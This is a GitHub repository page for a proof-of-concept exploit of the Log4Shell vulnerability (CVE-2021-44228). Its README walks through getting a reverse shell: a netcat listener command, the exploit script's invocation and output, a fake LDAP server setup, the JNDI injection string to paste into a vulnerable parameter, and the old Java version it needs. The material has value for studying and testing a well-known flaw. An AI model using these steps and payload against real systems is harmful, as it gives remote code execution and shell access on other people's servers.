Skip to content
/ log4j-shell-poc Public
forked from kozmer/log4j-shell-poc

A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.

0 stars 530 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Hritish42/log4j-shell-poc

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

51 Commits
target
target
 
 
README.md
README.md
 
 
poc.py
poc.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

log4j-shell-poc

A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.

Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others.

In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it.

A video showing the exploitation process

Vuln Web App:

webapp.mp4

Ghidra (Old script):

ghidra.mp4

Minecraft PoC (Old script):

mclol.mp4

Proof-of-concept (POC)

As a PoC we have created a python file that automates the process.

Requirements:

pip install -r requirements.txt

Usage:

  • Start a netcat listener to accept reverse shell connection.
nc -lvnp 9001
  • Launch the exploit.
    Note: For this to work, the extracted java archive has to be named: jdk1.8.0_20, and be in the same directory.
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.


At the time of creating the exploit we were unsure of exactly which versions of java work and which don't so chose to work with one of the earliest versions of java 8: java-8u20.

Oracle thankfully provides an archive for all previous java versions:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Scroll down to 8u20 and download the appropriate files for your operating system and hardware. Screenshot from 2021-12-11 00-09-25

Note: You do need to make an account to be able to download the package.

Once you have downloaded and extracted the archive, you can find java and a few related binaries in jdk1.8.0_20/bin.
Note: Please make sure to extract the jdk folder into this repository with the same name in order for it to work.

❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

About

A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%